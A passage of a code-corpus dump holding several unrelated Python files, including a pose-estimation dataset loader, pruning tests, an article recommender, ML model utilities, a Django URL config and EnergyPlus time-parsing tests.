gaussian is in-bounds\n ul = [int(mu_x - tmp_size), int(mu_y - tmp_size)]\n br = [int(mu_x + tmp_size + 1), int(mu_y + tmp_size + 1)]\n # print(ul)\n # print(br)\n if ul[0] >= self.heatmap_size[0] or ul[1] >= self.heatmap_size[1] \\\n or br[0] < 0 or br[1] < 0:\n # If not, just return the image as is\n target_weight[joint_id] = 0\n continue\n\n # # Generate gaussian\n size = 2 * tmp_size + 1\n x = np.arange(0, size, 1, np.float32)\n y = x[:, np.newaxis]\n x0 = y0 = size // 2\n # The gaussian is not normalized, we want the center value to equal 1\n g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * self.sigma ** 2))\n\n # Usable gaussian range\n g_x = max(0, -ul[0]), min(br[0], self.heatmap_size[0]) - ul[0]\n g_y = max(0, -ul[1]), min(br[1], self.heatmap_size[1]) - ul[1]\n # print(g_x)\n # print(g_y)\n # Image range\n img_x = max(0, ul[0]), min(br[0], self.heatmap_size[0])\n img_y = max(0, ul[1]), min(br[1], self.heatmap_size[1])\n # print(img_x)\n # print(img_y)\n v = target_weight[joint_id]\n if v > 0.5:\n target[joint_id][img_y[0]:img_y[1], img_x[0]:img_x[1]] = \\\n g[g_y[0]:g_y[1], g_x[0]:g_x[1]]\n\n if self.use_different_joints_weight:\n target_weight = np.multiply(target_weight, self.joints_weight)\n\n # tt = np.nonzero(target[0])\n # print(np.transpose(tt))\n\n return target, target_weight\n\n def __getitem__(self, index):\n item = {}\n scale = self.scale[index].copy()\n center = self.center[index].copy()\n\n # Get augmentation parameters\n flip, pn, rot, sc = self.augm_params()\n \n # Load image\n # print(self.img_dir)\n # print(type(self.img_dir))\n # print(self.imgname[index])\n # print(type(str(self.imgname[index])))\n\n try: \n imgname = join(self.img_dir, self.imgname[index].decode(\"utf-8\"))\n except:\n imgname = join(self.img_dir, self.imgname[index])\n try:\n img = cv2.imread(imgname)[:,:,::-1].copy().astype(np.float32)\n # print(imgname)\n # print(1111)\n except TypeError:\n print(imgname)\n # print(2222)\n orig_shape = np.array(img.shape)[:2]\n\n # Get SMPL parameters, if available\n if self.has_smpl[index]:\n pose = self.pose[index].copy()\n betas = self.betas[index].copy()\n else:\n pose = np.zeros(72)\n betas = np.zeros(10)\n\n # Process image\n img = self.rgb_processing(img, center, sc*scale, rot, flip, pn)\n img = torch.from_numpy(img).float()\n # Store image before normalization to use it in visualization\n item['img'] = self.normalize_img(img)\n item['pose'] = torch.from_numpy(self.pose_processing(pose, rot, flip)).float()\n item['betas'] = torch.from_numpy(betas).float()\n item['imgname'] = imgname\n\n # Get 3D pose, if available\n if self.has_pose_3d:\n S = self.pose_3d[index].copy()\n item['pose_3d'] = torch.from_numpy(self.j3d_processing(S, rot, flip)).float()\n else:\n item['pose_3d'] = torch.zeros(24,4, dtype=torch.float32)\n\n # Get 2D keypoints and apply augmentation transforms\n keypoints = self.keypoints[index].copy()\n # print(keypoints[27])\n item['keypoints'] = torch.from_numpy(self.j2d_processing(keypoints, center, sc*scale, rot, flip)).float()\n # print(item['keypoints'][27])\n item['has_smpl'] = self.has_smpl[index]\n item['has_pose_3d'] = self.has_pose_3d\n item['scale'] = float(sc * scale)\n item['center'] = center.astype(np.float32)\n item['orig_shape'] = orig_shape\n item['is_flipped'] = flip\n item['rot_angle'] = np.float32(rot)\n item['gender'] = self.gender[index]\n item['sample_index'] = index\n item['dataset_name'] = self.dataset\n\n target, target_weight = self.generate_target(item['keypoints'].numpy())\n\n item['target'] = torch.from_numpy(target)\n item['target_weight'] = torch.from_numpy(target_weight)\n\n\n try:\n item['maskname'] = self.maskname[index]\n except AttributeError:\n item['maskname'] = ''\n try:\n item['partname'] = self.partname[index]\n except AttributeError:\n item['partname'] = ''\n\n return item\n\n def __len__(self):\n return len(self.imgname)\n","sub_path":"datasets/base_JointsDataset.py","file_name":"base_JointsDataset.py","file_ext":"py","file_size_in_byte":13541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648418190","text":"import numpy as np\nfrom sklearn import preprocessing\n\n## Label encoding\n# Sample input labels\ninput_labels =['red', 'black', 'red', 'green', 'black', 'yellow', 'white']\n#Create label encoder and fit the labels\nencoder = preprocessing.LabelEncoder()\nencoder.fit(input_labels)\n\n# Print the mapping\nprint(\"\\nLabel mapping:\")\nfor i,item in enumerate(encoder.classes_):\n print(item,\"-->\",i)\n#Encode a set of labels using the encoder\ntest_labels = ['green','red','black']\nencoded_values = encoder.transform(test_labels)\nprint(\"\\nLabels=\",test_labels)\nprint(\"Encoded values=\", list(encoded_values))","sub_path":"LearnArtificialIntelligenceWithPython/Chapter02/Chapter02_02.py","file_name":"Chapter02_02.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450528324","text":"import unittest\nfrom unittest import TestCase\nfrom nn_pruning.patch_coordinator import SparseTrainingArguments, ModelPatchingCoordinator\n\nfrom transformers import AutoConfig, AutoModelForQuestionAnswering\n\nimport copy\n\nclass TestFun(TestCase):\n def helper(self, sparse_args, model_name_or_path):\n config = AutoConfig.from_pretrained(model_name_or_path)\n model = AutoModelForQuestionAnswering.from_pretrained(model_name_or_path)\n\n device = \"cuda\"\n cache_dir = None\n logit_names = [\"start_logits\", \"end_logits\"]\n teacher_constructor = AutoModelForQuestionAnswering\n\n coordinator = ModelPatchingCoordinator(sparse_args, device, cache_dir, model_name_or_path, logit_names, teacher_constructor)\n\n return config, model, coordinator\n\n def test_base(self):\n sparse_args = SparseTrainingArguments.hybrid(20.0)\n sparse_args.layer_norm_patch = True\n sparse_args.gelu_patch = True\n\n ref_stats = {\n \"bert-base-uncased\": {\"main\": {\"patched\": 72}, \"layer_norm\": {\"patched\": 25}, \"gelu\": {\"patched\": 12}},\n \"bert-large-uncased\": {\"main\": {\"patched\": 144}, \"layer_norm\": {\"patched\": 49}, \"gelu\": {\"patched\": 24}},\n \"facebook/bart-base\": {\"main\": {\"patched\": 96}, \"layer_norm\": {\"patched\": 32}, \"gelu\": {\"patched\": 12}}\n }\n\n for model_name_or_path in ref_stats.keys():\n config, model, coordinator = self.helper(sparse_args, model_name_or_path)\n\n coordinator.patch_model(model)\n\n stats = copy.deepcopy(coordinator.stats)\n\n print(stats[\"main\"])\n for k in stats:\n del stats[k][\"patched_names\"]\n\n self.assertEqual(stats, ref_stats[model_name_or_path])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"nn_pruning/tests/test_patch2.py","file_name":"test_patch2.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203956325","text":"# Youtube-dl options\nydl_opts = {\n 'quiet': True,\n 'skip_download': True,\n 'forceid': True,\n 'forcetitle': True,\n 'forceurl': True,\n 'forcejson': True,\n 'ignoreerrors': True,\n 'download': False,\n}\n\n# Paths\nnewVideosPath = './data/newVideos.json'\npredResultsPath = './data/predResults.json'\nmodelLRPath = './models/LogisticRegression.pkl.z'\nmodelLGBMPath = './models/LightGBM.pkl.z'\nmodelRFPath = './models/RandomForest.pkl.z'\nTFidVecPath = './models/Vectorizer.pkl.z'\n\n\n# Query filters for collecting data\nbaseQuery = \"ytsearchdate100\"\nqueryFilters = [\"machine+learning\", \"data+science\", \"kaggle\"]\n\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6808819","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sqlite3\nimport pickle\n\nlogdir = os.path.expanduser(\"~\")\nlogdir = os.path.join(logdir, \".tech-parser\")\n\ndef get_similarity(article1, article2):\n\twords1 = get_words(article1['title'])\n\twords2 = get_words(article2['title'])\n\t\n\tlen_all_words = len(words1) + len(words2)\n\tshrd = []\n\tfor word in words1:\n\t\tif word in words2:\n\t\t\tif shrd.count(word) < min(words1.count(word), words2.count(word)):\n\t\t\t\tshrd.append(word)\n\t\n\treturn 2.0 * len(shrd) / len_all_words\n\ndef find_similiar(articles):\n\tinteresting_articles = get_interesting_articles()\n\tsimiliar_articles = []\n\t\n\tfor article in articles:\n\t\tif article in interesting_articles:\n\t\t\tsimiliar_articles.append([article, 0.0])\n\t\t\tcontinue\n\t\t\n\t\tscores = []\n\t\tfor interesting_article in interesting_articles:\n\t\t\tscore = get_similarity(article, interesting_article)\n\t\t\tscores.append(score)\n\t\taverage = sum(scores) / len(scores) if len(scores) > 0 else 0.0\n\t\tif [article, average] not in similiar_articles:\n\t\t\tsimiliar_articles.append([article, average])\n\t\n\treturn similiar_articles\n\ndef get_words(s, exclude=[\"a\", \"an\", \"the\", \"is\"]):\n\ts = s.strip().lower()\n\tr1 = re.compile(r\"(?P\\w+)n['\\u2019]t\", re.UNICODE)\n\tr2 = re.compile(r\"(?P\\w+)['\\u2019]s\", re.UNICODE)\n\tr3 = re.compile(r\"(?P\\w+)['\\u2019]m\", re.UNICODE)\n\tr4 = re.compile(r\"(?P\\w+)['\\u2019]re\", re.UNICODE)\n\tr5 = re.compile(r\"(?P\\w+)['\\u2019]ve\", re.UNICODE)\n\tr6 = re.compile(r\"(?P\\w+)['\\u2019]d\", re.UNICODE)\n\tr7 = re.compile(r\"(?P\\w+)['\\u2019]ll\", re.UNICODE)\n\tr8 = re.compile(u\"[^А-Я^а-я^A-Z^a-z^ ]\", re.UNICODE)\n\ts = r1.sub(\"\\g not\", s)\n\ts = r2.sub(\"\\g\", s)\n\ts = r3.sub(\"\\g am\", s)\n\ts = r4.sub(\"\\g are\", s)\n\ts = r5.sub(\"\\g have\", s)\n\ts = r6.sub(\"\\g would\", s)\n\ts = r7.sub(\"\\g will\", s)\n\ts = r8.sub(\"\", s)\n\t\n\twords = s.split(\" \")\n\tfor word in exclude:\n\t\ttry:\n\t\t\twords.remove(word)\n\t\texcept ValueError:\n\t\t\tpass\n\t\n\treturn [word for word in words if word]\n\ndef get_interesting_articles():\n\tsetup_db()\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute('SELECT * FROM interesting_articles;')\n\tres = cur.fetchall()\n\treturn [{'title': x[1],\n\t\t\t'link': x[2],\n\t\t\t'source': x[3]} for x in res]\n\ndef add_article(addr):\n\tf = open(os.path.join(logdir, \"articles_dumped\"), 'rb')\n\tdumped = f.read()\n\tf.close()\n\t\n\tarticles = pickle.loads(dumped)\n\t\n\tfor article in articles:\n\t\tif article[0]['link'] == addr:\n\t\t\tbreak\n\t\n\tadd_to_interesting(article)\n\ndef add_to_interesting(article):\n\tsetup_db()\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute('SELECT count(link) from interesting_articles;')\n\tif cur.fetchone()[0] > 150:\n\t\tcur.execute(\"\"\"DELETE FROM interesting_articles\n\t\t\tWHERE id = (SELECT MIN(id) FROM interesting_articles);\"\"\")\n\ttry:\n\t\tcur.execute(\"\"\"INSERT INTO\n\t\t\tinteresting_articles(title, link, source) VALUES(?, ?, ?);\"\"\",\n\t\t\t(article[0]['title'], article[0]['link'], article[0]['source']))\n\t\tcon.commit()\n\texcept sqlite3.IntegrityError:\n\t\tpass\n\tcon.close()\n\ndef setup_db():\n\tcon = sqlite3.connect(os.path.join(logdir, 'interesting.db'))\n\tcur = con.cursor()\n\tcur.execute(\"\"\"CREATE TABLE IF NOT EXISTS interesting_articles\n\t\t\t(id INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\t\ttitle TEXT, link TEXT, source TEXT, UNIQUE(link));\"\"\")\n\tcon.commit()\n\tcon.close()\n","sub_path":"TechParser/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"43648841","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login,logout\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cmdb.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^login/', 'user_log.views.user_login', name='user login'),\n url(r'^cmdb/', 'cmdb.views.cmdb', name=' cmdb'),\n url(r'^cabinet/', 'cabinet.views.cabinet', name=' cabinet'),\n url(r'^service/', 'services.views.service', name=' service'),\n url(r'^logout/$', 'django.contrib.auth.views.logout',{'template_name':'logout.html'}),\n url(r'^*', 'django.contrib.auth.views.login', {'template_name': 'login.html'}, name='user login'),\n\n)\n","sub_path":"nice_cmdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102410879","text":"import numpy as np\nimport torch.nn as nn\nimport torch\n\n\nclass KNN:\n \"\"\"\n k-nearest neighbor baseline to infer number of visits\n \"\"\"\n\n def __init__(self, k=1, weighted=False, median=False):\n self.k = k\n self.weighted = weighted\n self.median = median\n\n def __call__(self, data):\n \"\"\"\n Get closes feature vector in node_features and use their label\n \"\"\"\n node_features_matrix = data.x\n # only the node features with label <=1 are eligible\n node_features = node_features_matrix[node_features_matrix[:, -1] <= 1]\n assert len(node_features.shape) == 2\n # assert that only one batch\n # assert len(torch.unique(data.batch)) == 1\n assert len(data.y.shape) == 2\n new_location_features = data.y[:, :-1]\n\n feats_wo_labels = node_features[:, :-1]\n distance_to_feats = torch.mean(\n (feats_wo_labels - new_location_features) ** 2, axis=1\n )\n knn_inds = torch.argsort(distance_to_feats)[: self.k]\n if self.weighted:\n knn_dist = distance_to_feats[knn_inds]\n normed_knn_dist = knn_dist / torch.sum(knn_dist)\n avg_label = torch.sum(normed_knn_dist * node_features[knn_inds, -1])\n else:\n if self.median:\n avg_label = torch.median(node_features[knn_inds, -1])\n else:\n avg_label = torch.mean(node_features[knn_inds, -1])\n return avg_label\n","sub_path":"predict_visits/baselines/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"647606262","text":"import abc\n\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score, confusion_matrix, mean_absolute_error, mean_squared_error, precision_score\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\n\nfrom visualization import plot_confusion_matrix\n\n\nclass BaseModel:\n\n def __init__(self):\n self.model = None\n\n @abc.abstractmethod\n def train(self, features, targets):\n print('%s training...' % self.__class__.__name__)\n\n @abc.abstractmethod\n def predict(self, features):\n print('%s predict...' % self.__class__.__name__)\n\n @abc.abstractmethod\n def predict_prob(self, features):\n print('%s predict_prob...' % self.__class__.__name__)\n\n @abc.abstractmethod\n def predict_log_prob(self, features):\n print('%s predict_prob...' % self.__class__.__name__)\n\n @abc.abstractmethod\n def accuracy_score(self, features, targets):\n print('%s accuracy_score...' % self.__class__.__name__)\n\n def cross_val_score(self, features, targets, cv):\n print('%s cross_val_score...' % self.__class__.__name__)\n scores = cross_val_score(self.model, X=features, y=targets, cv=cv)\n print('cross_val_score results:\\n %s' % scores)\n return scores\n\n def cross_val_predict(self, features, targets):\n print('%s cross_val_predict...' % self.__class__.__name__)\n scores = cross_val_predict(self.model, X=features, y=targets)\n print('cross_val_predict results:\\n%s' % scores)\n return scores\n\n def metrics_mse(self, y_pred, y_true, sample_weight=None):\n \"\"\"\n 带权均方误差。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :param sample_weight: 样本权重\n :return: float\n 带权均方误差。\n \"\"\"\n print('%s metrics_mse...' % self.__class__.__name__)\n result = mean_squared_error(y_true=y_true, y_pred=y_pred,\n sample_weight=sample_weight)\n return result\n\n def metrics_mae(self, y_pred, y_true, sample_weight=None):\n \"\"\"\n 带权绝对值误差。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :param sample_weight: 样本权重\n :return: float\n 带权绝对值误差。\n \"\"\"\n print('%s metrics_mae...' % self.__class__.__name__)\n result = mean_absolute_error(y_true=y_true, y_pred=y_pred,\n sample_weight=sample_weight)\n return result\n\n def metrics_weighted_rmse(self, y_pred, y_true):\n \"\"\"\n 计算RMSE评分,为了体现预测结果0、1、2不同的重要性,增加对1,2预测错误的惩罚度,\n 在评分计算时对不同行为分别乘以1,2,2.5的权重因子。\n np.average((y_true - y_pred) ** 2, axis=0, weights=weights)\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :return: 评分\n \"\"\"\n weight_dict = {0: 1, 1: 2, 2: 2.5} # 不同类别的误判惩罚权重\n weights = [weight_dict[l] for l in y_true]\n mse = np.average((y_true - y_pred) ** 2, axis=0, weights=weights)\n score = 1 / (1 + np.sqrt(mse))\n return score\n\n def metrics_accuracy(self, y_pred, y_true, sample_weight=None):\n \"\"\"\n 准确率。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :param sample_weight: 样本权重\n :return: float\n 准确率。\n \"\"\"\n print('%s metrics_accuracy...' % self.__class__.__name__)\n result = accuracy_score(y_true=y_true, y_pred=y_pred,\n sample_weight=sample_weight)\n return result\n\n def metrics_precision(self, y_pred, y_true, sample_weight=None):\n \"\"\"\n 查准率,各个类别查准率的均值。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :param sample_weight: 样本权重\n :return: float\n 查准率。\n \"\"\"\n print('%s metrics_precision...' % self.__class__.__name__)\n result = precision_score(y_true=y_true, y_pred=y_pred,\n average='macro', sample_weight=sample_weight)\n return result\n\n def metrics_precision_individual(self, y_pred, y_true):\n \"\"\"\n 计算每个类别的查准率。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :return: dict\n 每个类别的查准率。\n \"\"\"\n print('%s metrics_precision_individual...' % self.__class__.__name__)\n y_pred, y_true = np.array(y_pred), np.array(y_true)\n result = {}\n for label in sorted(set(y_true)):\n indices = np.argwhere(y_pred == label)\n correct_num = np.sum(y_true[indices] == label)\n result[label] = correct_num / len(indices)\n return result\n\n def metrics_recall_individual(self, y_pred, y_true):\n \"\"\"\n 计算每个类别的查全率。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :return: dict\n 每个类别的查全率。\n \"\"\"\n print('%s metrics_recall_individual...' % self.__class__.__name__)\n y_pred, y_true = np.array(y_pred), np.array(y_true)\n result = {}\n for label in sorted(set(y_true)):\n indices = np.argwhere(y_true == label)\n correct_num = np.sum(y_pred[indices] == label)\n result[label] = correct_num / len(indices)\n return result\n\n def metrics_confusion_matrix(self, y_pred, y_true, labels=None, plot_matrix=False):\n \"\"\"\n 混淆矩阵。\n :param y_pred: 预测标签\n :param y_true: 真实标签\n :param labels: 标签序列,包含所有的标签类别。\n :param plot_matrix: 是否可视化混淆矩阵\n :return: 混淆矩阵, shape=[n_classes, n_classes]\n \"\"\"\n print('%s metrics_confusion_matrix...' % self.__class__.__name__)\n matrix = confusion_matrix(y_true, y_pred, labels)\n if plot_matrix:\n plot_confusion_matrix(matrix, labels)\n return matrix\n\n def feature_ranking(self, feature_names):\n importances = self.model.feature_importances_\n indices = np.argsort(importances)[::-1]\n # Print the feature ranking\n print(\"Feature ranking:\")\n for rank, index in enumerate(indices):\n print(\"Rank %d: %s (%f)\" % (rank + 1, feature_names[index], importances[index]))\n\n def save_model(self, path):\n \"\"\"\n 模型持久化。\n :param path: 保存路径。\n \"\"\"\n print('%s save_model...' % self.__class__.__name__)\n joblib.dump(self.model, path)\n\n def load_model(self, path):\n \"\"\"\n 加载模型。\n :param path: 模型保存路径。\n \"\"\"\n print('%s load_model...' % self.__class__.__name__)\n self.model = joblib.load(path)\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504671621","text":"\"\"\"replace url_id by sim_number atribute to sim_tag_user\n\nRevision ID: 2c02f6744c08\nRevises: ae13e1bc1cfe\nCreate Date: 2020-10-28 11:28:48.007949\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '2c02f6744c08'\ndown_revision = 'ae13e1bc1cfe'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sim_tag_user', sa.Column('sim_number', sa.Integer(), nullable=False))\n op.drop_column('sim_tag_user', 'url_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sim_tag_user', sa.Column('url_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=False))\n op.drop_column('sim_tag_user', 'sim_number')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/2c02f6744c08_replace_url_id_by_sim_number_atribute_.py","file_name":"2c02f6744c08_replace_url_id_by_sim_number_atribute_.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"20480150","text":"#!/usr/bin/env python\nimport random\nimport string\nimport os\n\nos.system(\"clear\")\n##########################################################\n# using split\n# test = \"this is a string\"\n# result = \"#\".join(test.split('t'))\n# print(result)\n\n##########################################################\n# lol = int(input(\"give input : \"))\n# print(lol)\n\n# function\n##########################################################\n# def printdef():\n# \tpass\n# list ###################################################\narr = [1, 2, 3, 4, 5, 6]\narr.append([2, 3, 4])\narr.append(\"Adsd\")\nprint(arr)\n#for loop#################################################\nfor n in range(2, 22):\n print(n)\n#\tfor n in range(3):\n# if else#################################################\n#\tif (lol % 2) == 1:\n#\t\tprint(\"odd\")\n#\telif (lol % 2) != 1:\n#\t\tprint(\"even\")\n#\telse:\n#\t\tprint(\"lol\")\n\n# string check condition##################################\nlol = \"asdfdhhjjlm\"\nfor c in lol:\n print(c)\nn = \"d\"\nprint(n in lol)\nprint(n)\n\n# list funtions###########################################\n# a= [1,2,3,4,5,6,7]\n# print(a[1:5])\n# print(a[3:])\n# print(a[:-1])\n\n#while loop ###############################\n# i=1;\n# while i!=6:\n# \ti=input(\"enter number \" )\n\n#calling the function #################################\n\n# x = [1, 2, 3]\n# y = [5, 10, 15]\n# allproducts = [a*b for a in x for b in y] # good stuff\n# print(allproducts)\n# a = (random.sample(range(100),5)) # gives a list of 5 random numbers\n# print(a)\n\n# def get_int():\n# \treturn int(input(\"number ples\"))\n# result = get_int()\n# print(result)\n\n# populating a list\n# item_list =[]\n# def get_list():\n# \treturn(input(\"enter the list \"))\n# for n in range(4):\n# \titem_list.append(get_list())\n\n# print(item_list[0],item_list[len(item_list)-1]) # returns last and first of the list\n# printdef() # calling the functuion\n\n# fabonaccci\n# def fibonacci():\n# num = int(input(\"How many numbers that generates?:\"))\n# i = 1\n# if num == 0:\n# fib = []\n# elif num == 1:\n# fib = [1]\n# elif num == 2:\n# fib = [1, 1]\n# elif num > 2:\n# fib = [1, 1]\n# while i < (num - 1):\n# fib.append(fib[i] + fib[i-1])\n# i += 1\n# return fib\n\n\n# print(fibonacci())\n# input()\n###########################################################\n# generating random pass\n\n\ndef passGen():\n pwd = \"qwerty\"\n pwd = \"\".join(random.sample(pwd, 5)).join(string.punctuation)\n print(pwd)\n\n\n# passGen()\n","sub_path":"python/pyFunct.py","file_name":"pyFunct.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22075132","text":"import pytest\n\nfrom esofile_reader.processing.eplus.esofile_reader import read_file\nfrom esofile_reader.processing.eplus.esofile_time import *\nfrom esofile_reader.processing.eplus.esofile_time import EsoTimestamp\nfrom tests.paths import *\n\n\n@pytest.mark.parametrize(\n \"year,interval_tuple,expected\",\n [\n (2002, EsoTimestamp(1, 1, 0, 0), datetime(2002, 1, 1, 0, 0)),\n (2002, EsoTimestamp(1, 1, 1, 30), datetime(2002, 1, 1, 0, 30)),\n (2002, EsoTimestamp(12, 31, 24, 60), datetime(2003, 1, 1, 0, 0)),\n (2002, EsoTimestamp(10, 31, 24, 60), datetime(2002, 11, 1, 0, 0)),\n (2002, EsoTimestamp(10, 25, 24, 60), datetime(2002, 10, 26, 0, 0, 0)),\n (2002, EsoTimestamp(10, 25, 22, 60), datetime(2002, 10, 25, 22, 0, 0)),\n (2002, EsoTimestamp(10, 25, 22, 10), datetime(2002, 10, 25, 21, 10, 0)),\n ],\n)\ndef test_parse_eso_timestamp(year, interval_tuple, expected):\n assert parse_eso_timestamp(year, *interval_tuple) == expected\n\n\n@pytest.mark.parametrize(\n \"date,interval_tuple,expected\",\n [\n (datetime(2002, 1, 1), (2, 3, 4, 30), datetime(2002, 2, 3, 3, 30)),\n (datetime(2002, 1, 1), (None, 3, 4, 30), datetime(2002, 1, 3, 3, 30)),\n (datetime(2002, 1, 1), (None, None, 10, 30), datetime(2002, 1, 1, 9, 30)),\n (datetime(2002, 12, 31), (None, None, 24, 60), datetime(2003, 1, 1, 0, 0)),\n ],\n)\ndef test_combine_peak_result_datetime(date, interval_tuple, expected):\n assert combine_peak_result_datetime(date, *interval_tuple) == expected\n\n\ndef test_month_act_days():\n m_envs = [31, 59, 90, 97]\n out = get_month_n_days_from_cumulative(m_envs)\n assert out, [31, 28, 31, 7]\n\n\ndef test_month_act_days_single_env():\n m_envs = [[31]]\n out = get_month_n_days_from_cumulative(m_envs)\n assert out == [[31]]\n\n\ndef test_find_num_of_days_annual():\n ann_num_days = [1]\n rp_num_days = [365]\n out = find_num_of_days_annual(ann_num_days, rp_num_days)\n assert out == [365]\n\n ann_num_days = [1, 2]\n rp_num_days = [700]\n out = find_num_of_days_annual(ann_num_days, rp_num_days)\n assert out == [350, 350]\n\n\n@pytest.mark.parametrize(\"year, expected\", [(2020, 366), (2001, 365)])\ndef test_get_num_of_days(year, expected):\n days = {M: [10, 20, 30], RP: [123], A: [None]}\n dates = {A: [datetime(year, 1, 1)]}\n out = get_n_days_from_cumulative(days, dates)\n assert out == {\"monthly\": [10, 10, 10], \"runperiod\": [123], \"annual\": [expected]}\n\n\n@pytest.mark.parametrize(\n \"first_step_data,current_step_data,increment\",\n [\n (EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 1, 0, 0), True),\n (EsoTimestamp(2, 1, 0, 0), EsoTimestamp(1, 1, 0, 0), True),\n (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(12, 31, 24, 60), False),\n (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(1, 1, 1, 0), True),\n ],\n ids=[\"monthly\", \"monthly\", \"daily\", \"daily\"],\n)\ndef test_increment_year(first_step_data, current_step_data, increment):\n assert (\n check_year_increment(\n first_step_data,\n current_step_data,\n )\n is increment\n )\n\n\n@pytest.mark.parametrize(\n \"first_step_data,current_step_data\",\n [\n (EsoTimestamp(1, 1, 0, 0), EsoTimestamp(2, 1, 0, 0)),\n (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(1, 1, 2, 0)),\n ],\n ids=[\"monthly\", \"daily\"],\n)\ndef test_do_not_increment_year_monthly(first_step_data, current_step_data):\n assert not check_year_increment(first_step_data, current_step_data)\n\n\n@pytest.mark.parametrize(\n \"year,interval_tuples,expected\",\n [\n (\n 2002,\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(2, 1, 0, 0), EsoTimestamp(3, 1, 0, 0)],\n [\n datetime(2002, 1, 1, 0, 0, 0),\n datetime(2002, 2, 1, 0, 0, 0),\n datetime(2002, 3, 1, 0, 0, 0),\n ],\n ),\n (\n 2002,\n [\n EsoTimestamp(12, 31, 23, 60),\n EsoTimestamp(12, 31, 24, 60),\n EsoTimestamp(1, 1, 1, 60),\n ],\n [\n datetime(2002, 12, 31, 23, 0, 0),\n datetime(2003, 1, 1, 0, 0, 0),\n datetime(2003, 1, 1, 1, 0, 0),\n ],\n ),\n ],\n)\ndef test_generate_timestamp_dates(year, interval_tuples, expected):\n assert generate_datetime_dates(interval_tuples, year) == expected\n\n\ndef test_convert_to_dt_index():\n env_dct = {\n \"hourly\": [\n EsoTimestamp(12, 31, 23, 60),\n EsoTimestamp(12, 31, 24, 60),\n EsoTimestamp(1, 1, 1, 60),\n ],\n \"monthly\": [\n EsoTimestamp(1, 1, 0, 0),\n EsoTimestamp(2, 1, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n ],\n }\n dates = convert_raw_dates(env_dct, 2002)\n assert dates == {\n \"hourly\": [\n datetime(2002, 12, 31, 23, 00, 00),\n datetime(2003, 1, 1, 00, 00, 00),\n datetime(2003, 1, 1, 1, 00, 00),\n ],\n \"monthly\": [\n datetime(2002, 1, 1, 0, 0, 0),\n datetime(2002, 2, 1, 0, 0, 0),\n datetime(2002, 3, 1, 0, 0, 0),\n ],\n }\n\n\ndef test_update_start_dates():\n env_dct = {\n \"hourly\": [datetime(2002, 5, 26, 0, 0), datetime(2002, 5, 26, 1, 0)],\n \"monthly\": [datetime(2002, 5, 1, 0, 0)],\n \"annual\": [datetime(2002, 1, 1, 0, 0)],\n \"runperiod\": [datetime(2002, 1, 1, 0, 0)],\n }\n update_start_dates(env_dct)\n assert env_dct == {\n \"hourly\": [datetime(2002, 5, 26, 0, 0), datetime(2002, 5, 26, 1, 0)],\n \"monthly\": [datetime(2002, 5, 26, 0, 0)],\n \"annual\": [datetime(2002, 5, 26, 0, 0)],\n \"runperiod\": [datetime(2002, 5, 26, 0, 0)],\n }\n\n\n@pytest.mark.parametrize(\n \"year, is_leap, date, day\",\n [\n (2020, True, EsoTimestamp(10, 28, 0, 0), \"Wednesday\"),\n (2020, True, EsoTimestamp(2, 29, 